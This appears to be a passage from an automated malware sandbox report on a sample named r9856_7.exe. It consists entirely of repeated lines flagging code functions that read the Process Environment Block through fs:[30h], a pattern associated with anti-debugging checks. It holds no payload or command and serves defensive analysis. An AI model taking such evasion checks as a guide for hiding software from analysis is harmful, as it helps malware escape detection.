            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011780A8 mov eax, dword ptr fs:[00000030h]4_2_011780A8
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011620DE mov eax, dword ptr fs:[00000030h]4_2_011620DE
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011220F0 mov ecx, dword ptr fs:[00000030h]4_2_011220F0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E80E9 mov eax, dword ptr fs:[00000030h]4_2_010E80E9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DA0E3 mov ecx, dword ptr fs:[00000030h]4_2_010DA0E3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011660E0 mov eax, dword ptr fs:[00000030h]4_2_011660E0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DC0F0 mov eax, dword ptr fs:[00000030h]4_2_010DC0F0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01100310 mov ecx, dword ptr fs:[00000030h]4_2_01100310
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111A30B mov eax, dword ptr fs:[00000030h]4_2_0111A30B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111A30B mov eax, dword ptr fs:[00000030h]4_2_0111A30B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111A30B mov eax, dword ptr fs:[00000030h]4_2_0111A30B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DC310 mov ecx, dword ptr fs:[00000030h]4_2_010DC310
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B8324 mov eax, dword ptr fs:[00000030h]4_2_011B8324
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B8324 mov ecx, dword ptr fs:[00000030h]4_2_011B8324
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B8324 mov eax, dword ptr fs:[00000030h]4_2_011B8324
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B8324 mov eax, dword ptr fs:[00000030h]4_2_011B8324
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011AA352 mov eax, dword ptr fs:[00000030h]4_2_011AA352
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01188350 mov ecx, dword ptr fs:[00000030h]4_2_01188350
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116035C mov eax, dword ptr fs:[00000030h]4_2_0116035C
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116035C mov eax, dword ptr fs:[00000030h]4_2_0116035C
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116035C mov eax, dword ptr fs:[00000030h]4_2_0116035C
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116035C mov ecx, dword ptr fs:[00000030h]4_2_0116035C
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116035C mov eax, dword ptr fs:[00000030h]4_2_0116035C
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116035C mov eax, dword ptr fs:[00000030h]4_2_0116035C
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B634F mov eax, dword ptr fs:[00000030h]4_2_011B634F
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01162349 mov eax, dword ptr fs:[00000030h]4_2_01162349
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01162349 mov eax, dword ptr fs:[00000030h]4_2_01162349
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01162349 mov eax, dword ptr fs:[00000030h]4_2_01162349
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01162349 mov eax, dword ptr fs:[00000030h]4_2_01162349
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01162349 mov eax, dword ptr fs:[00000030h]4_2_01162349
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01162349 mov eax, dword ptr fs:[00000030h]4_2_01162349
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01162349 mov eax, dword ptr fs:[00000030h]4_2_01162349
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01162349 mov eax, dword ptr fs:[00000030h]4_2_01162349
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01162349 mov eax, dword ptr fs:[00000030h]4_2_01162349
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01162349 mov eax, dword ptr fs:[00000030h]4_2_01162349
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01162349 mov eax, dword ptr fs:[00000030h]4_2_01162349
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01162349 mov eax, dword ptr fs:[00000030h]4_2_01162349
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01162349 mov eax, dword ptr fs:[00000030h]4_2_01162349
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01162349 mov eax, dword ptr fs:[00000030h]4_2_01162349
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01162349 mov eax, dword ptr fs:[00000030h]4_2_01162349
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118437C mov eax, dword ptr fs:[00000030h]4_2_0118437C
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DE388 mov eax, dword ptr fs:[00000030h]4_2_010DE388
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DE388 mov eax, dword ptr fs:[00000030h]4_2_010DE388
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DE388 mov eax, dword ptr fs:[00000030h]4_2_010DE388
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010D8397 mov eax, dword ptr fs:[00000030h]4_2_010D8397
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010D8397 mov eax, dword ptr fs:[00000030h]4_2_010D8397
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010D8397 mov eax, dword ptr fs:[00000030h]4_2_010D8397
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110438F mov eax, dword ptr fs:[00000030h]4_2_0110438F
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110438F mov eax, dword ptr fs:[00000030h]4_2_0110438F
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118E3DB mov eax, dword ptr fs:[00000030h]4_2_0118E3DB
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118E3DB mov eax, dword ptr fs:[00000030h]4_2_0118E3DB
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118E3DB mov ecx, dword ptr fs:[00000030h]4_2_0118E3DB
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118E3DB mov eax, dword ptr fs:[00000030h]4_2_0118E3DB
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011843D4 mov eax, dword ptr fs:[00000030h]4_2_011843D4
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011843D4 mov eax, dword ptr fs:[00000030h]4_2_011843D4
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA3C0 mov eax, dword ptr fs:[00000030h]4_2_010EA3C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA3C0 mov eax, dword ptr fs:[00000030h]4_2_010EA3C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA3C0 mov eax, dword ptr fs:[00000030h]4_2_010EA3C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA3C0 mov eax, dword ptr fs:[00000030h]4_2_010EA3C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA3C0 mov eax, dword ptr fs:[00000030h]4_2_010EA3C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA3C0 mov eax, dword ptr fs:[00000030h]4_2_010EA3C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E83C0 mov eax, dword ptr fs:[00000030h]4_2_010E83C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E83C0 mov eax, dword ptr fs:[00000030h]4_2_010E83C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E83C0 mov eax, dword ptr fs:[00000030h]4_2_010E83C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E83C0 mov eax, dword ptr fs:[00000030h]4_2_010E83C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0119C3CD mov eax, dword ptr fs:[00000030h]4_2_0119C3CD
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011663C0 mov eax, dword ptr fs:[00000030h]4_2_011663C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F03E9 mov eax, dword ptr fs:[00000030h]4_2_010F03E9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F03E9 mov eax, dword ptr fs:[00000030h]4_2_010F03E9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F03E9 mov eax, dword ptr fs:[00000030h]4_2_010F03E9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F03E9 mov eax, dword ptr fs:[00000030h]4_2_010F03E9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F03E9 mov eax, dword ptr fs:[00000030h]4_2_010F03E9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F03E9 mov eax, dword ptr fs:[00000030h]4_2_010F03E9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F03E9 mov eax, dword ptr fs:[00000030h]4_2_010F03E9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F03E9 mov eax, dword ptr fs:[00000030h]4_2_010F03E9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011163FF mov eax, dword ptr fs:[00000030h]4_2_011163FF
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010FE3F0 mov eax, dword ptr fs:[00000030h]4_2_010FE3F0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010FE3F0 mov eax, dword ptr fs:[00000030h]4_2_010FE3F0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010FE3F0 mov eax, dword ptr fs:[00000030h]4_2_010FE3F0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010D823B mov eax, dword ptr fs:[00000030h]4_2_010D823B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B625D mov eax, dword ptr fs:[00000030h]4_2_011B625D
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0119A250 mov eax, dword ptr fs:[00000030h]4_2_0119A250
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0119A250 mov eax, dword ptr fs:[00000030h]4_2_0119A250
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01168243 mov eax, dword ptr fs:[00000030h]4_2_01168243
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01168243 mov ecx, dword ptr fs:[00000030h]4_2_01168243
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E6259 mov eax, dword ptr fs:[00000030h]4_2_010E6259
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DA250 mov eax, dword ptr fs:[00000030h]4_2_010DA250
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010D826B mov eax, dword ptr fs:[00000030h]4_2_010D826B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01190274 mov eax, dword ptr fs:[00000030h]4_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E4260 mov eax, dword ptr fs:[00000030h]4_2_010E4260
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E4260 mov eax, dword ptr fs:[00000030h]4_2_010E4260
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E4260 mov eax, dword ptr fs:[00000030h]4_2_010E4260
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01160283 mov eax, dword ptr fs:[00000030h]4_2_01160283
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01160283 mov eax, dword ptr fs:[00000030h]4_2_01160283
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01160283 mov eax, dword ptr fs:[00000030h]4_2_01160283
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E284 mov eax, dword ptr fs:[00000030h]4_2_0111E284
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E284 mov eax, dword ptr fs:[00000030h]4_2_0111E284
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F02A0 mov eax, dword ptr fs:[00000030h]4_2_010F02A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F02A0 mov eax, dword ptr fs:[00000030h]4_2_010F02A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011762A0 mov eax, dword ptr fs:[00000030h]4_2_011762A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011762A0 mov ecx, dword ptr fs:[00000030h]4_2_011762A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011762A0 mov eax, dword ptr fs:[00000030h]4_2_011762A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011762A0 mov eax, dword ptr fs:[00000030h]4_2_011762A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011762A0 mov eax, dword ptr fs:[00000030h]4_2_011762A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011762A0 mov eax, dword ptr fs:[00000030h]4_2_011762A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA2C3 mov eax, dword ptr fs:[00000030h]4_2_010EA2C3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA2C3 mov eax, dword ptr fs:[00000030h]4_2_010EA2C3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA2C3 mov eax, dword ptr fs:[00000030h]4_2_010EA2C3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA2C3 mov eax, dword ptr fs:[00000030h]4_2_010EA2C3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA2C3 mov eax, dword ptr fs:[00000030h]4_2_010EA2C3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B62D6 mov eax, dword ptr fs:[00000030h]4_2_011B62D6
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F02E1 mov eax, dword ptr fs:[00000030h]4_2_010F02E1
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F02E1 mov eax, dword ptr fs:[00000030h]4_2_010F02E1
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F02E1 mov eax, dword ptr fs:[00000030h]4_2_010F02E1
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01176500 mov eax, dword ptr fs:[00000030h]4_2_01176500
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B4500 mov eax, dword ptr fs:[00000030h]4_2_011B4500
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B4500 mov eax, dword ptr fs:[00000030h]4_2_011B4500
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B4500 mov eax, dword ptr fs:[00000030h]4_2_011B4500
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B4500 mov eax, dword ptr fs:[00000030h]4_2_011B4500
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B4500 mov eax, dword ptr fs:[00000030h]4_2_011B4500
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B4500 mov eax, dword ptr fs:[00000030h]4_2_011B4500
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B4500 mov eax, dword ptr fs:[00000030h]4_2_011B4500
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E53E mov eax, dword ptr fs:[00000030h]4_2_0110E53E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E53E mov eax, dword ptr fs:[00000030h]4_2_0110E53E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E53E mov eax, dword ptr fs:[00000030h]4_2_0110E53E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E53E mov eax, dword ptr fs:[00000030h]4_2_0110E53E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E53E mov eax, dword ptr fs:[00000030h]4_2_0110E53E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0535 mov eax, dword ptr fs:[00000030h]4_2_010F0535
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0535 mov eax, dword ptr fs:[00000030h]4_2_010F0535
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0535 mov eax, dword ptr fs:[00000030h]4_2_010F0535
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0535 mov eax, dword ptr fs:[00000030h]4_2_010F0535
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0535 mov eax, dword ptr fs:[00000030h]4_2_010F0535
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0535 mov eax, dword ptr fs:[00000030h]4_2_010F0535
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E8550 mov eax, dword ptr fs:[00000030h]4_2_010E8550
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E8550 mov eax, dword ptr fs:[00000030h]4_2_010E8550
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111656A mov eax, dword ptr fs:[00000030h]4_2_0111656A
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111656A mov eax, dword ptr fs:[00000030h]4_2_0111656A
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111656A mov eax, dword ptr fs:[00000030h]4_2_0111656A
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E2582 mov eax, dword ptr fs:[00000030h]4_2_010E2582
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E2582 mov ecx, dword ptr fs:[00000030h]4_2_010E2582
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E59C mov eax, dword ptr fs:[00000030h]4_2_0111E59C
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01114588 mov eax, dword ptr fs:[00000030h]4_2_01114588
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011045B1 mov eax, dword ptr fs:[00000030h]4_2_011045B1
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011045B1 mov eax, dword ptr fs:[00000030h]4_2_011045B1
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011605A7 mov eax, dword ptr fs:[00000030h]4_2_011605A7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011605A7 mov eax, dword ptr fs:[00000030h]4_2_011605A7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011605A7 mov eax, dword ptr fs:[00000030h]4_2_011605A7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111A5D0 mov eax, dword ptr fs:[00000030h]4_2_0111A5D0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111A5D0 mov eax, dword ptr fs:[00000030h]4_2_0111A5D0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E5CF mov eax, dword ptr fs:[00000030h]4_2_0111E5CF
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E5CF mov eax, dword ptr fs:[00000030h]4_2_0111E5CF
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E65D0 mov eax, dword ptr fs:[00000030h]4_2_010E65D0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E25E0 mov eax, dword ptr fs:[00000030h]4_2_010E25E0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E5E7 mov eax, dword ptr fs:[00000030h]4_2_0110E5E7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E5E7 mov eax, dword ptr fs:[00000030h]4_2_0110E5E7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E5E7 mov eax, dword ptr fs:[00000030h]4_2_0110E5E7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E5E7 mov eax, dword ptr fs:[00000030h]4_2_0110E5E7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E5E7 mov eax, dword ptr fs:[00000030h]4_2_0110E5E7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E5E7 mov eax, dword ptr fs:[00000030h]4_2_0110E5E7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E5E7 mov eax, dword ptr fs:[00000030h]4_2_0110E5E7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E5E7 mov eax, dword ptr fs:[00000030h]4_2_0110E5E7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111C5ED mov eax, dword ptr fs:[00000030h]4_2_0111C5ED
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111C5ED mov eax, dword ptr fs:[00000030h]4_2_0111C5ED
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01118402 mov eax, dword ptr fs:[00000030h]4_2_01118402
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01118402 mov eax, dword ptr fs:[00000030h]4_2_01118402
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01118402 mov eax, dword ptr fs:[00000030h]4_2_01118402
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111A430 mov eax, dword ptr fs:[00000030h]4_2_0111A430
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DC427 mov eax, dword ptr fs:[00000030h]4_2_010DC427
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DE420 mov eax, dword ptr fs:[00000030h]4_2_010DE420
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DE420 mov eax, dword ptr fs:[00000030h]4_2_010DE420
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DE420 mov eax, dword ptr fs:[00000030h]4_2_010DE420
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01166420 mov eax, dword ptr fs:[00000030h]4_2_01166420
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01166420 mov eax, dword ptr fs:[00000030h]4_2_01166420
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01166420 mov eax, dword ptr fs:[00000030h]4_2_01166420
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01166420 mov eax, dword ptr fs:[00000030h]4_2_01166420
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01166420 mov eax, dword ptr fs:[00000030h]4_2_01166420
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01166420 mov eax, dword ptr fs:[00000030h]4_2_01166420
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01166420 mov eax, dword ptr fs:[00000030h]4_2_01166420
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110245A mov eax, dword ptr fs:[00000030h]4_2_0110245A
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0119A456 mov eax, dword ptr fs:[00000030h]4_2_0119A456
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010D645D mov eax, dword ptr fs:[00000030h]4_2_010D645D
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E443 mov eax, dword ptr fs:[00000030h]4_2_0111E443
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E443 mov eax, dword ptr fs:[00000030h]4_2_0111E443
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E443 mov eax, dword ptr fs:[00000030h]4_2_0111E443
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E443 mov eax, dword ptr fs:[00000030h]4_2_0111E443
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E443 mov eax, dword ptr fs:[00000030h]4_2_0111E443
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E443 mov eax, dword ptr fs:[00000030h]4_2_0111E443
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E443 mov eax, dword ptr fs:[00000030h]4_2_0111E443
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E443 mov eax, dword ptr fs:[00000030h]4_2_0111E443
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110A470 mov eax, dword ptr fs:[00000030h]4_2_0110A470
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110A470 mov eax, dword ptr fs:[00000030h]4_2_0110A470
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110A470 mov eax, dword ptr fs:[00000030h]4_2_0110A470
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116C460 mov ecx, dword ptr fs:[00000030h]4_2_0116C460
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0119A49A mov eax, dword ptr fs:[00000030h]4_2_0119A49A
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011144B0 mov ecx, dword ptr fs:[00000030h]4_2_011144B0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E64AB mov eax, dword ptr fs:[00000030h]4_2_010E64AB
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116A4B0 mov eax, dword ptr fs:[00000030h]4_2_0116A4B0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E04E5 mov ecx, dword ptr fs:[00000030h]4_2_010E04E5
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01110710 mov eax, dword ptr fs:[00000030h]4_2_01110710
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111C700 mov eax, dword ptr fs:[00000030h]4_2_0111C700
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E0710 mov eax, dword ptr fs:[00000030h]4_2_010E0710
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115C730 mov eax, dword ptr fs:[00000030h]4_2_0115C730
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111273C mov eax, dword ptr fs:[00000030h]4_2_0111273C
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111273C mov ecx, dword ptr fs:[00000030h]4_2_0111273C
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111273C mov eax, dword ptr fs:[00000030h]4_2_0111273C
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111C720 mov eax, dword ptr fs:[00000030h]4_2_0111C720
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111C720 mov eax, dword ptr fs:[00000030h]4_2_0111C720
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122750 mov eax, dword ptr fs:[00000030h]4_2_01122750
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122750 mov eax, dword ptr fs:[00000030h]4_2_01122750
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01164755 mov eax, dword ptr fs:[00000030h]4_2_01164755
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116E75D mov eax, dword ptr fs:[00000030h]4_2_0116E75D
